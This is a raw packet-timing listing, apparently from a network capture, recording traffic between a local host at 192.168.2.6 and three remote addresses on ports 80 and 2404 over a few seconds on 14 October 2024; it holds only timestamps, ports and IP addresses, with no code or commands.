                    Oct 14, 2024 11:07:18.526684046 CEST4991280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:07:18.526738882 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.526796103 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.526803970 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.526886940 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.526887894 CEST4991280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:07:18.526894093 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.526906013 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.526938915 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.526942968 CEST4991280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:07:18.526954889 CEST4991280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:07:18.526993990 CEST4991280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:07:18.526997089 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.527004957 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.527079105 CEST4991280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:07:18.527147055 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.527153969 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.527175903 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.527182102 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.527203083 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.527209044 CEST4991280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:07:18.527209997 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.527215958 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.527223110 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.527230024 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.527235031 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.527240992 CEST4991280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:07:18.527241945 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.527250051 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.527261972 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.527275085 CEST4991280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:07:18.527281046 CEST4991280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:07:18.527316093 CEST4991280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:07:18.530834913 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.530852079 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.530864954 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.530870914 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.530878067 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.530884027 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.530917883 CEST4991280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:07:18.530944109 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.530957937 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.530982018 CEST4991280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:07:18.530988932 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.531008959 CEST4991280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:07:18.531016111 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.531023979 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.531034946 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.531042099 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.531048059 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.531049013 CEST4991280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:07:18.531054020 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.531065941 CEST4991280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:07:18.531089067 CEST4991280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:07:18.531121969 CEST4991280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:07:18.531210899 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.531227112 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.531234026 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.531244040 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.531250000 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.531275988 CEST4991280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:07:18.531295061 CEST4991280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:07:18.531347036 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.531418085 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.531426907 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.531436920 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.531443119 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.531450033 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.531492949 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.531501055 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.531508923 CEST4991280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:07:18.531517982 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.531523943 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.531552076 CEST4991280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:07:18.531574011 CEST4991280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:07:18.531655073 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.531661987 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.531678915 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.531686068 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.531697989 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.531703949 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.531712055 CEST4991280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:07:18.531712055 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.531721115 CEST4991280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:07:18.531727076 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.531733990 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.531739950 CEST4991280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:07:18.531775951 CEST4991280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:07:18.531809092 CEST4991280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:07:18.531924963 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.531976938 CEST4991280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:07:18.531986952 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.531992912 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.532005072 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.532037973 CEST4991280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:07:18.532054901 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.532061100 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.532073975 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.532079935 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.532085896 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.532092094 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.532110929 CEST4991280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:07:18.532131910 CEST4991280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:07:18.532226086 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.532233000 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.532246113 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.532252073 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.532258987 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.532263041 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.532289982 CEST4991280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:07:18.532319069 CEST4991280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:07:18.614619017 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.614650011 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.614655972 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.614763021 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.614768982 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.614780903 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.614788055 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.614794016 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.614793062 CEST4991280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:07:18.614809990 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.614816904 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.614837885 CEST4991280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:07:18.614840031 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.614850998 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.614860058 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.614871979 CEST4991280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:07:18.614914894 CEST4991280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:07:18.614936113 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.614943027 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.614954948 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.614959002 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.614965916 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.615024090 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.615036011 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.615045071 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.615050077 CEST4991280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:07:18.615070105 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.615082979 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.615087986 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.615093946 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.615096092 CEST4991280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:07:18.615117073 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.615117073 CEST4991280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:07:18.615125895 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.615137100 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.615143061 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.615149975 CEST4991280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:07:18.615173101 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.615179062 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.615190029 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.615195990 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.615200996 CEST4991280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:07:18.615205050 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.615216017 CEST4991280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:07:18.615292072 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.615298033 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.615319014 CEST4991280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:07:18.615319967 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.615325928 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.615336895 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.615344048 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.615348101 CEST4991280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:07:18.615351915 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.615416050 CEST4991280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:07:18.615420103 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.615428925 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.615434885 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.615441084 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.615482092 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.615488052 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.615494967 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.615509033 CEST4991280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:07:18.615509987 CEST4991280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:07:18.615600109 CEST4991280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:07:18.615614891 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.615622044 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.615632057 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.615638971 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.615658998 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.615665913 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.615677118 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.615683079 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.615686893 CEST4991280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:07:18.615706921 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.615717888 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.615719080 CEST4991280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:07:18.615726948 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.615751982 CEST4991280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:07:18.615792036 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.615798950 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.615818977 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.615820885 CEST4991280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:07:18.615889072 CEST4991280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:07:18.615889072 CEST4991280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:07:18.615906000 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.615911961 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.615926981 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.615942955 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.615953922 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.615962029 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.615966082 CEST4991280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:07:18.616007090 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.616012096 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.616024017 CEST8049912172.67.128.117192.168.2.6
                    Oct 14, 2024 11:07:18.616035938 CEST4991280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:07:18.616092920 CEST4991280192.168.2.6172.67.128.117
                    Oct 14, 2024 11:07:20.496995926 CEST499282404192.168.2.6154.216.18.65
                    Oct 14, 2024 11:07:20.501921892 CEST240449928154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:20.502027988 CEST499282404192.168.2.6154.216.18.65
                    Oct 14, 2024 11:07:20.506582022 CEST499282404192.168.2.6154.216.18.65
                    Oct 14, 2024 11:07:20.511424065 CEST240449928154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:21.214303017 CEST240449928154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:21.335659027 CEST499282404192.168.2.6154.216.18.65
                    Oct 14, 2024 11:07:21.371376991 CEST240449928154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:21.375998974 CEST499282404192.168.2.6154.216.18.65
                    Oct 14, 2024 11:07:21.380769968 CEST240449928154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:21.381099939 CEST499282404192.168.2.6154.216.18.65
                    Oct 14, 2024 11:07:21.385795116 CEST240449928154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:21.754899025 CEST240449928154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:21.765783072 CEST499282404192.168.2.6154.216.18.65
                    Oct 14, 2024 11:07:21.770625114 CEST240449928154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:21.902914047 CEST240449928154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:21.945064068 CEST499282404192.168.2.6154.216.18.65
                    Oct 14, 2024 11:07:22.002043009 CEST499392404192.168.2.6154.216.18.65
                    Oct 14, 2024 11:07:22.007391930 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:22.007477999 CEST499392404192.168.2.6154.216.18.65
                    Oct 14, 2024 11:07:22.120534897 CEST499392404192.168.2.6154.216.18.65
                    Oct 14, 2024 11:07:22.125538111 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:22.394417048 CEST4994580192.168.2.6178.237.33.50
                    Oct 14, 2024 11:07:22.399461031 CEST8049945178.237.33.50192.168.2.6
                    Oct 14, 2024 11:07:22.399523973 CEST4994580192.168.2.6178.237.33.50
                    Oct 14, 2024 11:07:22.399662018 CEST4994580192.168.2.6178.237.33.50
                    Oct 14, 2024 11:07:22.405061960 CEST8049945178.237.33.50192.168.2.6
                    Oct 14, 2024 11:07:22.687843084 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:22.804496050 CEST499392404192.168.2.6154.216.18.65
                    Oct 14, 2024 11:07:22.836396933 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:22.840887070 CEST499392404192.168.2.6154.216.18.65
                    Oct 14, 2024 11:07:22.845818043 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:22.845909119 CEST499392404192.168.2.6154.216.18.65
                    Oct 14, 2024 11:07:22.850759029 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:22.850837946 CEST499392404192.168.2.6154.216.18.65
                    Oct 14, 2024 11:07:22.855665922 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.027940989 CEST8049945178.237.33.50192.168.2.6
                    Oct 14, 2024 11:07:23.028037071 CEST4994580192.168.2.6178.237.33.50
                    Oct 14, 2024 11:07:23.090286016 CEST499282404192.168.2.6154.216.18.65
                    Oct 14, 2024 11:07:23.095321894 CEST240449928154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.229422092 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.229453087 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.229475975 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.229486942 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.229510069 CEST499392404192.168.2.6154.216.18.65
                    Oct 14, 2024 11:07:23.229541063 CEST499392404192.168.2.6154.216.18.65
                    Oct 14, 2024 11:07:23.229679108 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.229691029 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.229703903 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.229708910 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.229793072 CEST499392404192.168.2.6154.216.18.65
                    Oct 14, 2024 11:07:23.230787992 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.230813026 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.230828047 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.230844975 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.230897903 CEST499392404192.168.2.6154.216.18.65
                    Oct 14, 2024 11:07:23.230897903 CEST499392404192.168.2.6154.216.18.65
                    Oct 14, 2024 11:07:23.234668016 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.304449081 CEST499392404192.168.2.6154.216.18.65
                    Oct 14, 2024 11:07:23.338247061 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.338270903 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.338300943 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.338315964 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.338324070 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.338332891 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.338346004 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.338346004 CEST499392404192.168.2.6154.216.18.65
                    Oct 14, 2024 11:07:23.338414907 CEST499392404192.168.2.6154.216.18.65
                    Oct 14, 2024 11:07:23.338414907 CEST499392404192.168.2.6154.216.18.65
                    Oct 14, 2024 11:07:23.339164019 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.339189053 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.339204073 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.339221001 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.339222908 CEST499392404192.168.2.6154.216.18.65
                    Oct 14, 2024 11:07:23.339229107 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.339260101 CEST499392404192.168.2.6154.216.18.65
                    Oct 14, 2024 11:07:23.339306116 CEST499392404192.168.2.6154.216.18.65
                    Oct 14, 2024 11:07:23.340044022 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.340082884 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.340096951 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.340130091 CEST499392404192.168.2.6154.216.18.65
                    Oct 14, 2024 11:07:23.340137959 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.340152979 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.340234995 CEST499392404192.168.2.6154.216.18.65
                    Oct 14, 2024 11:07:23.340990067 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.341006041 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.341022015 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.341034889 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.341039896 CEST499392404192.168.2.6154.216.18.65
                    Oct 14, 2024 11:07:23.341065884 CEST499392404192.168.2.6154.216.18.65
                    Oct 14, 2024 11:07:23.447422981 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.447458982 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.447474003 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.447474003 CEST499392404192.168.2.6154.216.18.65
                    Oct 14, 2024 11:07:23.447490931 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.447505951 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.447520971 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.447536945 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.447544098 CEST499392404192.168.2.6154.216.18.65
                    Oct 14, 2024 11:07:23.447544098 CEST499392404192.168.2.6154.216.18.65
                    Oct 14, 2024 11:07:23.447592974 CEST499392404192.168.2.6154.216.18.65
                    Oct 14, 2024 11:07:23.447766066 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.447781086 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.447797060 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.447810888 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.447813034 CEST499392404192.168.2.6154.216.18.65
                    Oct 14, 2024 11:07:23.447849035 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.447854042 CEST499392404192.168.2.6154.216.18.65
                    Oct 14, 2024 11:07:23.447865009 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.447880983 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.448025942 CEST499392404192.168.2.6154.216.18.65
                    Oct 14, 2024 11:07:23.448749065 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.448765039 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.448781013 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.448795080 CEST499392404192.168.2.6154.216.18.65
                    Oct 14, 2024 11:07:23.448796034 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.448868036 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.448882103 CEST499392404192.168.2.6154.216.18.65
                    Oct 14, 2024 11:07:23.448883057 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.448899984 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.448939085 CEST499392404192.168.2.6154.216.18.65
                    Oct 14, 2024 11:07:23.448939085 CEST499392404192.168.2.6154.216.18.65
                    Oct 14, 2024 11:07:23.449759007 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.449774981 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.449806929 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.449821949 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.449836969 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.449851036 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.449867010 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.449873924 CEST499392404192.168.2.6154.216.18.65
                    Oct 14, 2024 11:07:23.449873924 CEST499392404192.168.2.6154.216.18.65
                    Oct 14, 2024 11:07:23.449948072 CEST499392404192.168.2.6154.216.18.65
                    Oct 14, 2024 11:07:23.450714111 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.450767994 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.450783968 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.450788021 CEST499392404192.168.2.6154.216.18.65
                    Oct 14, 2024 11:07:23.450826883 CEST499392404192.168.2.6154.216.18.65
                    Oct 14, 2024 11:07:23.555955887 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.555990934 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.556005001 CEST240449939154.216.18.65192.168.2.6
                    Oct 14, 2024 11:07:23.556021929 CEST240449939154.216.18.65192.168.2.6
